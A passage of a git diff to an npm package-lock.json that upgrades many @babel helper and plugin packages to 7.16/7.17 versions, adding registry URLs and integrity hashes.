"https://registry.npmjs.org/@babel/helper-annotate-as-pure/-/helper-annotate-as-pure-7.16.7.tgz", + "integrity": "sha512-s6t2w/IPQVTAET1HitoowRGXooX8mCgtuP5195wD/QJPV6wYjpujCGF7JuMODVX2ZAJOf1GT6DT9MHEZvLOFSw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-builder-binary-assignment-operator-visitor": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-builder-binary-assignment-operator-visitor/-/helper-builder-binary-assignment-operator-visitor-7.16.7.tgz", + "integrity": "sha512-C6FdbRaxYjwVu/geKW4ZeQ0Q31AftgRcdSnZ5/jsH6BzCJbtvXvhpfkbkThYSuutZA7nCXpPR6AD9zd1dprMkA==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-explode-assignable-expression": "^7.14.5", - "@babel/types": "^7.14.5" + "@babel/helper-explode-assignable-expression": "^7.16.7", + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-compilation-targets": { - "version": "7.14.5", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.16.7.tgz", + "integrity": "sha512-mGojBwIWcwGD6rfqgRXVlVYmPAv7eOpIemUG3dGnDdCY4Pae70ROij3XmfrH6Fa1h1aiDylpglbZyktfzyo/hA==", "dependencies": { - "@babel/compat-data": "^7.14.5", - "@babel/helper-validator-option": "^7.14.5", - "browserslist": "^4.16.6", + "@babel/compat-data": "^7.16.4", + "@babel/helper-validator-option": "^7.16.7", + "browserslist": "^4.17.5", "semver": "^6.3.0" }, "engines": { @@ -1091,16 +1096,18 @@ } }, "node_modules/@babel/helper-create-class-features-plugin": { - "version": "7.14.6", + "version": "7.17.6", + "resolved": "https://registry.npmjs.org/@babel/helper-create-class-features-plugin/-/helper-create-class-features-plugin-7.17.6.tgz", + "integrity": "sha512-SogLLSxXm2OkBbSsHZMM4tUi8fUzjs63AT/d0YQIzr6GSd8Hxsbk2KYDX0k0DweAzGMj/YWeiCsorIdtdcW8Eg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-annotate-as-pure": "^7.14.5", - "@babel/helper-function-name": "^7.14.5", - "@babel/helper-member-expression-to-functions": "^7.14.5", - "@babel/helper-optimise-call-expression": "^7.14.5", - "@babel/helper-replace-supers": "^7.14.5", - "@babel/helper-split-export-declaration": "^7.14.5" + "@babel/helper-annotate-as-pure": "^7.16.7", + "@babel/helper-environment-visitor": "^7.16.7", + "@babel/helper-function-name": "^7.16.7", + "@babel/helper-member-expression-to-functions": "^7.16.7", + "@babel/helper-optimise-call-expression": "^7.16.7", + "@babel/helper-replace-supers": "^7.16.7", + "@babel/helper-split-export-declaration": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -1110,12 +1117,13 @@ } }, "node_modules/@babel/helper-create-regexp-features-plugin": { - "version": "7.14.5", + "version": "7.17.0", + "resolved": "https://registry.npmjs.org/@babel/helper-create-regexp-features-plugin/-/helper-create-regexp-features-plugin-7.17.0.tgz", + "integrity": "sha512-awO2So99wG6KnlE+TPs6rn83gCz5WlEePJDTnLEqbchMVrBeAujURVphRdigsk094VhvZehFoNOihSlcBjwsXA==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-annotate-as-pure": "^7.14.5", - "regexpu-core": "^4.7.1" + "@babel/helper-annotate-as-pure": "^7.16.7", + "regexpu-core": "^5.0.1" }, "engines": { "node": ">=6.9.0" @@ -1171,255 +1179,293 @@ "semver": "bin/semver.js" } }, + "node_modules/@babel/helper-environment-visitor": { + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.16.7.tgz", + "integrity": "sha512-SLLb0AAn6PkUeAfKJCCOl9e1R53pQlGAfc4y4XuMRZfqeMYLE0dM1LMhqbGAlGQY0lfw5/ohoYWAe9V1yibRag==", + "dependencies": { + "@babel/types": "^7.16.7" + }, + "engines": { + "node": ">=6.9.0" + } + }, "node_modules/@babel/helper-explode-assignable-expression": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-explode-assignable-expression/-/helper-explode-assignable-expression-7.16.7.tgz", + "integrity": "sha512-KyUenhWMC8VrxzkGP0Jizjo4/Zx+1nNZhgocs+gLzyZyB8SHidhoq9KK/8Ato4anhwsivfkBLftky7gvzbZMtQ==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/types": "^7.14.5" + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-function-name": { - "version": "7.15.4", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.16.7.tgz", + "integrity": "sha512-QfDfEnIUyyBSR3HtrtGECuZ6DAyCkYFp7GHl75vFtTnn6pjKeK0T1DB5lLkFvBea8MdaiUABx3osbgLyInoejA==", "dependencies": { - "@babel/helper-get-function-arity": "^7.15.4", - "@babel/template": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/helper-get-function-arity": "^7.16.7", + "@babel/template": "^7.16.7", + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-function-name/node_modules/@babel/template": { - "version": "7.15.4", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.16.7.tgz", + "integrity": "sha512-I8j/x8kHUrbYRTUxXrrMbfCa7jxkE7tZre39x3kjr9hvI82cK1FfqLygotcWN5kdPGWcLdWMHpSBavse5tWw3w==", "dependencies": { - "@babel/code-frame": "^7.14.5", - "@babel/parser": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/code-frame": "^7.16.7", + "@babel/parser": "^7.16.7", + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-get-function-arity": { - "version": "7.15.4", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-get-function-arity/-/helper-get-function-arity-7.16.7.tgz", + "integrity": "sha512-flc+RLSOBXzNzVhcLu6ujeHUrD6tANAOU5ojrRx/as+tbzf8+stUCj7+IfRRoAbEZqj/ahXEMsjhOhgeZsrnTw==", "dependencies": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-hoist-variables": { - "version": "7.15.4", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.16.7.tgz", + "integrity": "sha512-m04d/0Op34H5v7pbZw6pSKP7weA6lsMvfiIAMeIvkY/R4xQtBSMFEigu9QTZ2qB/9l22vsxtM8a+Q8CzD255fg==", "dependencies": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-member-expression-to-functions": { - "version": "7.15.4", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-member-expression-to-functions/-/helper-member-expression-to-functions-7.16.7.tgz", + "integrity": "sha512-VtJ/65tYiU/6AbMTDwyoXGPKHgTsfRarivm+YbB5uAzKUyuPjgZSgAFeG87FCigc7KNHu2Pegh1XIT3lXjvz3Q==", + "dev": true, "dependencies": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-module-imports": { - "version": "7.15.4", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.16.7.tgz", + "integrity": "sha512-LVtS6TqjJHFc+nYeITRo6VLXve70xmq7wPhWTqDJusJEgGmkAACWwMiTNrvfoQo6hEhFwAIixNkvB0jPXDL8Wg==", "dependencies": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-module-transforms": { - "version": "7.15.8", - "license": "MIT", + "version": "7.17.6", + "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.17.6.tgz", + "integrity": "sha512-2ULmRdqoOMpdvkbT8jONrZML/XALfzxlb052bldftkicAUy8AxSCkD5trDPQcwHNmolcl7wP6ehNqMlyUw6AaA==", "dependencies": { - "@babel/helper-module-imports": "^7.15.4", - "@babel/helper-replace-supers": "^7.15.4", - "@babel/helper-simple-access": "^7.15.4", - "@babel/helper-split-export-declaration": "^7.15.4", - "@babel/helper-validator-identifier": "^7.15.7", - "@babel/template": "^7.15.4", - "@babel/traverse": "^7.15.4", - "@babel/types": "^7.15.6" + "@babel/helper-environment-visitor": "^7.16.7", + "@babel/helper-module-imports": "^7.16.7", + "@babel/helper-simple-access": "^7.16.7", + "@babel/helper-split-export-declaration": "^7.16.7", + "@babel/helper-validator-identifier": "^7.16.7", + "@babel/template": "^7.16.7", + "@babel/traverse": "^7.17.3", + "@babel/types": "^7.17.0" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-module-transforms/node_modules/@babel/template": { - "version": "7.15.4", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.16.7.tgz", + "integrity": "sha512-I8j/x8kHUrbYRTUxXrrMbfCa7jxkE7tZre39x3kjr9hvI82cK1FfqLygotcWN5kdPGWcLdWMHpSBavse5tWw3w==", "dependencies": { - "@babel/code-frame": "^7.14.5", - "@babel/parser": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/code-frame": "^7.16.7", + "@babel/parser": "^7.16.7", + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-optimise-call-expression": { - "version": "7.15.4", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-optimise-call-expression/-/helper-optimise-call-expression-7.16.7.tgz", + "integrity": "sha512-EtgBhg7rd/JcnpZFXpBy0ze1YRfdm7BnBX4uKMBd3ixa3RGAE002JZB66FJyNH7g0F38U05pXmA5P8cBh7z+1w==", + "dev": true, "dependencies": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-plugin-utils": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.16.7.tgz", + "integrity": "sha512-Qg3Nk7ZxpgMrsox6HreY1ZNKdBq7K72tDSliA6dCl5f007jR4ne8iD5UzuNnCJH2xBf2BEEVGr+/OL6Gdp7RxA==", "dev": true, - "license": "MIT", "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-remap-async-to-generator": { - "version": "7.15.4", + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/helper-remap-async-to-generator/-/helper-remap-async-to-generator-7.16.8.tgz", + "integrity": "sha512-fm0gH7Flb8H51LqJHy3HJ3wnE1+qtYR2A99K06ahwrawLdOFsCEWjZOrYricXJHoPSudNKxrMBUPEIPxiIIvBw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-annotate-as-pure": "^7.15.4", - "@babel/helper-wrap-function": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/helper-annotate-as-pure": "^7.16.7", + "@babel/helper-wrap-function": "^7.16.8", + "@babel/types": "^7.16.8" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-replace-supers": { - "version": "7.15.4", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-replace-supers/-/helper-replace-supers-7.16.7.tgz", + "integrity": "sha512-y9vsWilTNaVnVh6xiJfABzsNpgDPKev9HnAgz6Gb1p6UUwf9NepdlsV7VXGCftJM+jqD5f7JIEubcpLjZj5dBw==", + "dev": true, "dependencies": { - "@babel/helper-member-expression-to-functions": "^7.15.4", - "@babel/helper-optimise-call-expression": "^7.15.4", - "@babel/traverse": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/helper-environment-visitor": "^7.16.7", + "@babel/helper-member-expression-to-functions": "^7.16.7", + "@babel/helper-optimise-call-expression": "^7.16.7", + "@babel/traverse": "^7.16.7", + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-simple-access": { - "version": "7.15.4", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.16.7.tgz", + "integrity": "sha512-ZIzHVyoeLMvXMN/vok/a4LWRy8G2v205mNP0XOuf9XRLyX5/u9CnVulUtDgUTama3lT+bf/UqucuZjqiGuTS1g==", "dependencies": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-skip-transparent-expression-wrappers": { - "version": "7.14.5", + "version": "7.16.0", + "resolved": "https://registry.npmjs.org/@babel/helper-skip-transparent-expression-wrappers/-/helper-skip-transparent-expression-wrappers-7.16.0.tgz", + "integrity": "sha512-+il1gTy0oHwUsBQZyJvukbB4vPMdcYBrFHa0Uc4AizLxbq6BOYC51Rv4tWocX9BLBDLZ4kc6qUFpQ6HRgL+3zw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/types": "^7.14.5" + "@babel/types": "^7.16.0" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-split-export-declaration": { - "version": "7.15.4", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.16.7.tgz", + "integrity": "sha512-xbWoy/PFoxSWazIToT9Sif+jJTlrMcndIsaOKvTA6u7QEo7ilkRZpjew18/W3c7nm8fXdUDXh02VXTbZ0pGDNw==", "dependencies": { - "@babel/types": "^7.15.4" + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-validator-identifier": { - "version": "7.15.7", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.16.7.tgz", + "integrity": "sha512-hsEnFemeiW4D08A5gUAZxLBTXpZ39P+a+DGDsHw1yxqyQ/jzFEnxf5uTEGp+3bzAbNOxU1paTgYS4ECU/IgfDw==", "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-validator-option": { - "version": "7.14.5", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.16.7.tgz", + "integrity": "sha512-TRtenOuRUVo9oIQGPC5G9DgK4743cdxvtOw0weQNpZXaS16SCBi5MNjZF8vba3ETURjZpTbVn7Vvcf2eAwFozQ==", "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-wrap-function": { - "version": "7.15.4", + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/helper-wrap-function/-/helper-wrap-function-7.16.8.tgz", + "integrity": "sha512-8RpyRVIAW1RcDDGTA+GpPAwV22wXCfKOoM9bet6TLkGIFTkRQSkH1nMQ5Yet4MpoXe1ZwHPVtNasc2w0uZMqnw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-function-name": "^7.15.4", - "@babel/template": "^7.15.4", - "@babel/traverse": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/helper-function-name": "^7.16.7", + "@babel/template": "^7.16.7", + "@babel/traverse": "^7.16.8", + "@babel/types": "^7.16.8" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helper-wrap-function/node_modules/@babel/template": { - "version": "7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.16.7.tgz", + "integrity": "sha512-I8j/x8kHUrbYRTUxXrrMbfCa7jxkE7tZre39x3kjr9hvI82cK1FfqLygotcWN5kdPGWcLdWMHpSBavse5tWw3w==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/code-frame": "^7.14.5", - "@babel/parser": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/code-frame": "^7.16.7", + "@babel/parser": "^7.16.7", + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helpers": { - "version": "7.15.4", - "license": "MIT", + "version": "7.17.2", + "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.17.2.tgz", + "integrity": "sha512-0Qu7RLR1dILozr/6M0xgj+DFPmi6Bnulgm9M8BVa9ZCWxDqlSnqt3cf8IDPB5m45sVXUZ0kuQAgUrdSFFH79fQ==", "dependencies": { - "@babel/template": "^7.15.4", - "@babel/traverse": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/template": "^7.16.7", + "@babel/traverse": "^7.17.0", + "@babel/types": "^7.17.0" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/helpers/node_modules/@babel/template": { - "version": "7.15.4", - "license": "MIT", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.16.7.tgz", + "integrity": "sha512-I8j/x8kHUrbYRTUxXrrMbfCa7jxkE7tZre39x3kjr9hvI82cK1FfqLygotcWN5kdPGWcLdWMHpSBavse5tWw3w==", "dependencies": { - "@babel/code-frame": "^7.14.5", - "@babel/parser": "^7.15.4", - "@babel/types": "^7.15.4" + "@babel/code-frame": "^7.16.7", + "@babel/parser": "^7.16.7", + "@babel/types": "^7.16.7" }, "engines": { "node": ">=6.9.0" } }, "node_modules/@babel/highlight": { - "version": "7.14.5", - "license": "MIT", + "version": "7.16.10", + "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.16.10.tgz", + "integrity": "sha512-5FnTQLSLswEj6IkgVw5KusNUUFY9ZGqe/TRFnP/BKYHYgfh7tc+C7mwiy95/yNP7Dh9x580Vv8r7u7ZfTBFxdw==", "dependencies": { - "@babel/helper-validator-identifier": "^7.14.5", + "@babel/helper-validator-identifier": "^7.16.7", "chalk": "^2.0.0", "js-tokens": "^4.0.0" }, @@ -1428,8 +1474,9 @@ } }, "node_modules/@babel/parser": { - "version": "7.15.8", - "license": "MIT", + "version": "7.17.3", + "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.17.3.tgz", + "integrity": "sha512-7yJPvPV+ESz2IUTPbOL+YkIGyCqOyNIzdguKQuJGnH7bg1WTIifuM21YqokFt/THWh1AkCRn9IgoykTRCBVpzA==", "bin": { "parser": "bin/babel-parser.js" }, @@ -1437,14 +1484,30 @@ "node": ">=6.0.0" } }, + "node_modules/@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression": { + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression/-/plugin-bugfix-safari-id-destructuring-collision-in-function-expression-7.16.7.tgz", + "integrity": "sha512-anv/DObl7waiGEnC24O9zqL0pSuI9hljihqiDuFHC8d7/bjr/4RLGPWuc8rYOff/QPzbEPSkzG8wGG9aDuhHRg==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.16.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, "node_modules/@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining/-/plugin-bugfix-v8-spread-parameters-in-optional-chaining-7.16.7.tgz", + "integrity": "sha512-di8vUHRdf+4aJ7ltXhaDbPoszdkh59AQtJM5soLsuHpQJdFQZOA4uGj0V2u/CZ8bJ/u8ULDL5yq6FO/bCXnKHw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-skip-transparent-expression-wrappers": "^7.14.5", - "@babel/plugin-proposal-optional-chaining": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-skip-transparent-expression-wrappers": "^7.16.0", + "@babel/plugin-proposal-optional-chaining": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -1454,12 +1517,13 @@ } }, "node_modules/@babel/plugin-proposal-async-generator-functions": { - "version": "7.15.8", + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-async-generator-functions/-/plugin-proposal-async-generator-functions-7.16.8.tgz", + "integrity": "sha512-71YHIvMuiuqWJQkebWJtdhQTfd4Q4mF76q2IX37uZPkG9+olBxsX+rH1vkhFto4UeJZ9dPY2s+mDvhDm1u2BGQ==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-remap-async-to-generator": "^7.15.4", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-remap-async-to-generator": "^7.16.8", "@babel/plugin-syntax-async-generators": "^7.8.4" }, "engines": { @@ -1470,12 +1534,13 @@ } }, "node_modules/@babel/plugin-proposal-class-properties": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-class-properties/-/plugin-proposal-class-properties-7.16.7.tgz", + "integrity": "sha512-IobU0Xme31ewjYOShSIqd/ZGM/r/cuOz2z0MDbNrhF5FW+ZVgi0f2lyeoj9KFPDOAqsYxmLWZte1WOwlvY9aww==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-create-class-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-create-class-features-plugin": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -1485,12 +1550,13 @@ } }, "node_modules/@babel/plugin-proposal-class-static-block": { - "version": "7.14.5", + "version": "7.17.6", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-class-static-block/-/plugin-proposal-class-static-block-7.17.6.tgz", + "integrity": "sha512-X/tididvL2zbs7jZCeeRJ8167U/+Ac135AM6jCAx6gYXDUviZV5Ku9UDvWS2NCuWlFjIRXklYhwo6HhAC7ETnA==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-create-class-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-create-class-features-plugin": "^7.17.6", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-class-static-block": "^7.14.5" }, "engines": { @@ -1501,11 +1567,12 @@ } }, "node_modules/@babel/plugin-proposal-dynamic-import": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-dynamic-import/-/plugin-proposal-dynamic-import-7.16.7.tgz", + "integrity": "sha512-I8SW9Ho3/8DRSdmDdH3gORdyUuYnk1m4cMxUAdu5oy4n3OfN8flDEH+d60iG7dUfi0KkYwSvoalHzzdRzpWHTg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-dynamic-import": "^7.8.3" }, "engines": { @@ -1516,11 +1583,12 @@ } }, "node_modules/@babel/plugin-proposal-export-namespace-from": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-export-namespace-from/-/plugin-proposal-export-namespace-from-7.16.7.tgz", + "integrity": "sha512-ZxdtqDXLRGBL64ocZcs7ovt71L3jhC1RGSyR996svrCi3PYqHNkb3SwPJCs8RIzD86s+WPpt2S73+EHCGO+NUA==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-export-namespace-from": "^7.8.3" }, "engines": { @@ -1531,11 +1599,12 @@ } }, "node_modules/@babel/plugin-proposal-json-strings": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-json-strings/-/plugin-proposal-json-strings-7.16.7.tgz", + "integrity": "sha512-lNZ3EEggsGY78JavgbHsK9u5P3pQaW7k4axlgFLYkMd7UBsiNahCITShLjNQschPyjtO6dADrL24757IdhBrsQ==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-json-strings": "^7.8.3" }, "engines": { @@ -1546,11 +1615,12 @@ } }, "node_modules/@babel/plugin-proposal-logical-assignment-operators": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-logical-assignment-operators/-/plugin-proposal-logical-assignment-operators-7.16.7.tgz", + "integrity": "sha512-K3XzyZJGQCr00+EtYtrDjmwX7o7PLK6U9bi1nCwkQioRFVUv6dJoxbQjtWVtP+bCPy82bONBKG8NPyQ4+i6yjg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4" }, "engines": { @@ -1561,11 +1631,12 @@ } }, "node_modules/@babel/plugin-proposal-nullish-coalescing-operator": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-nullish-coalescing-operator/-/plugin-proposal-nullish-coalescing-operator-7.16.7.tgz", + "integrity": "sha512-aUOrYU3EVtjf62jQrCj63pYZ7k6vns2h/DQvHPWGmsJRYzWXZ6/AsfgpiRy6XiuIDADhJzP2Q9MwSMKauBQ+UQ==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3" }, "engines": { @@ -1576,11 +1647,12 @@ } }, "node_modules/@babel/plugin-proposal-numeric-separator": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-numeric-separator/-/plugin-proposal-numeric-separator-7.16.7.tgz", + "integrity": "sha512-vQgPMknOIgiuVqbokToyXbkY/OmmjAzr/0lhSIbG/KmnzXPGwW/AdhdKpi+O4X/VkWiWjnkKOBiqJrTaC98VKw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-numeric-separator": "^7.10.4" }, "engines": { @@ -1591,15 +1663,16 @@ } }, "node_modules/@babel/plugin-proposal-object-rest-spread": { - "version": "7.14.7", + "version": "7.17.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-object-rest-spread/-/plugin-proposal-object-rest-spread-7.17.3.tgz", + "integrity": "sha512-yuL5iQA/TbZn+RGAfxQXfi7CNLmKi1f8zInn4IgobuCWcAb7i+zj4TYzQ9l8cEzVyJ89PDGuqxK1xZpUDISesw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/compat-data": "^7.14.7", - "@babel/helper-compilation-targets": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/compat-data": "^7.17.0", + "@babel/helper-compilation-targets": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-transform-parameters": "^7.14.5" + "@babel/plugin-transform-parameters": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -1609,11 +1682,12 @@ } }, "node_modules/@babel/plugin-proposal-optional-catch-binding": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-optional-catch-binding/-/plugin-proposal-optional-catch-binding-7.16.7.tgz", + "integrity": "sha512-eMOH/L4OvWSZAE1VkHbr1vckLG1WUcHGJSLqqQwl2GaUqG6QjddvrOaTUMNYiv77H5IKPMZ9U9P7EaHwvAShfA==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-optional-catch-binding": "^7.8.3" }, "engines": { @@ -1624,12 +1698,13 @@ } }, "node_modules/@babel/plugin-proposal-optional-chaining": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-optional-chaining/-/plugin-proposal-optional-chaining-7.16.7.tgz", + "integrity": "sha512-eC3xy+ZrUcBtP7x+sq62Q/HYd674pPTb/77XZMb5wbDPGWIdUbSr4Agr052+zaUPSb+gGRnjxXfKFvx5iMJ+DA==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-skip-transparent-expression-wrappers": "^7.14.5", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-skip-transparent-expression-wrappers": "^7.16.0", "@babel/plugin-syntax-optional-chaining": "^7.8.3" }, "engines": { @@ -1640,12 +1715,13 @@ } }, "node_modules/@babel/plugin-proposal-private-methods": { - "version": "7.14.5", + "version": "7.16.11", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-private-methods/-/plugin-proposal-private-methods-7.16.11.tgz", + "integrity": "sha512-F/2uAkPlXDr8+BHpZvo19w3hLFKge+k75XUprE6jaqKxjGkSYcK+4c+bup5PdW/7W/Rpjwql7FTVEDW+fRAQsw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-create-class-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-create-class-features-plugin": "^7.16.10", + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -1655,13 